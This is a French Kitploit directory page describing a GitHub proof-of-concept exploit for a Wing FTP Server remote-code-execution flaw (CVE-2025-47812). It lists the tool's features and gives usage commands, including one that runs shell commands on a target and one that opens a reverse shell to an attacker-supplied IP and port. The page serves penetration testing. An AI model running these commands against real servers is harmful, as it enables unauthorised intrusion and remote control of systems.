Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
WingFTP-CVE-2025-47812-illdeed — Exploit d'exécution de commandes à distance pour Wing FTP Server (CVE-2025-47812) | Kitploit
Outils/GitHubGitHub/ill-deed/wingftp-cve-2025-47812-illdeed
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubill-deed/wingftp-cve-2025-47812-illdeed

WingFTP-CVE-2025-47812-illdeed

Exploit d'exécution de commandes à distance pour Wing FTP Server (CVE-2025-47812)

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-47812 - Exploitation RCE du serveur Wing FTP

Ce dépôt fournit une preuve de concept d'exploitation pour CVE-2025-47812, une vulnérabilité d'exécution de commande à distance (RCE) dans Wing FTP Server. Un attaquant peut injecter et exécuter des commandes système arbitraires basées sur Lua en abusant du paramètre username lors de l'authentification, ce qui conduit à une exécution complète de code à distance.


📌 Fonctionnalités de l'exploit

  • 🔧 Exécution à distance de commandes shell personnalisées
  • 🧬 Plusieurs payloads de reverse shell intégrés (bash, Python, netcat, etc.)
  • 🪪 Extraction automatique de l'UID depuis le Set-Cookie
  • 📦 Enregistre les UID réussis dans found_uids.txt
  • 🧪 Mode dry-run (aucune requête réelle envoyée — testez votre logique d'entrée/sortie en toute sécurité)
  • 🔁 Logique de nouvelle tentative en cas d'échec réseau
  • 🧹 Formatage plus propre des payloads et sortie lisible
  • ✅ Validation des entrées pour les IP, ports et URL
  • ⚙️ Support des arguments en ligne de commande pour les workflows automatisés

💻 Utilisation

Exécuter une commande shell simple :

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --cmd "id"

Déclencher un reverse shell :

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --reverse --ip YOUR_IP --port 4444

Mode dry-run (aucune requête ne sera envoyée) :

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --cmd "whoami" --dry-run

🔄 Modifications apportées à l'exploit original

Fonctionnalité/AméliorationDescription
✅ Analyse des argumentsAjout du support CLI argparse pour le mode non interactif
🔐 Validation des entréesVérifie la validité de l'URL/IP/port avant de tenter l'exploit
📦 Refactorisation des en-têtesExtraction des en-têtes HTTP dans une fonction réutilisable pour plus de cohérence
📄 Journalisation des UIDSauvegarde les jetons UID réussis dans found_uids.txt
🧪 Mode Dry-RunPermet des tests sécurisés sans envoyer de requêtes (--dry-run)
🕒 Délai d'attente + nouvelles tentativesAjoute un délai d'attente de requête et des tentatives automatiques en cas d'échec
🧼 Lisibilité des payloadsReformattage de la chaîne d'injection Lua pour plus de clarté et de maintenance
📊 Sortie structuréeEncapsulation des réponses du serveur et des informations de payload avec des délimiteurs pour une lecture facile
⚠️ Vérifications des codes de statutAvertit l'utilisateur si la cible renvoie des codes de statut HTTP inattendus
📝 Système de journalisationRemplace print() par le module logging Python pour un meilleur contrôle de la verbosité

⚠️ Avertissement

Ce projet est destiné uniquement à des tests de sécurité éducatifs et autorisés.
N'utilisez pas cet outil contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite de tester.


Télécharger l’outil